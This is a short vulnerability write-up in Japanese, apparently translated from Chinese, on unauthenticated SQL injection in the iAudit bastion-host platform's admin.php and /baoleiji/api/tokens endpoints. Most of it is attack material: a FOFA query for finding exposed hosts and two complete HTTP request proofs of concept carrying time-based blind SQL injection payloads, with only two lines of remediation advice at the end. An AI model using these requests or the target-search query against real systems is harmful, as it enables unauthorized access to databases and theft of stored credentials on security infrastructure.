0x01 製品紹介
COSCO Kylin は、自社の強力な研究開発能力と豊富な業界経験に基づいて、新世代のソフトウェアとハードウェアが統合された統合セキュリティ運用保守プラットフォームである iAudit 統合セキュリティ運用保守プラットフォームを独自に開発しました。本製品は、企業の運用保守担当者の運用保守プロセスにおける統一ID認証、統一認可、統一監査、統一監視をサポートし、従来の運用保守プロセスの盲点を解消し、運用保守の簡素化、制御可能な運用を実現します。視覚化は、企業の IT 内部統制にとって最も効果的な管理プラットフォームです。
0x02 脆弱性の概要
COSCO Kylin Fortress マシンの /baoleiji/api/tokens および admin.php インターフェイスには SQL インジェクションの脆弱性があり、認証されていない攻撃者はこの脆弱性を利用してデータベース内の機密情報や資格情報を取得することができ、最終的にはサーバーのクラッシュにつながる可能性があります。 。
0x03 再発環境
FOFA:cert.subject="バオレイ"
0x04 脆弱性の再発
PoC-1
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
5秒の遅延
実証実験-2
https://your-ip/baoleiji/api/tokens
この場合、抜け穴がある可能性があります
POST /baoleiji/api/tokens HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1
10秒の遅延
0x05 修復の提案
アクセス元アドレスを制限し、必要な場合以外はシステムをインターネットに公開しないでください。
安全なバージョンにアップグレードするか、パッチを適用してください。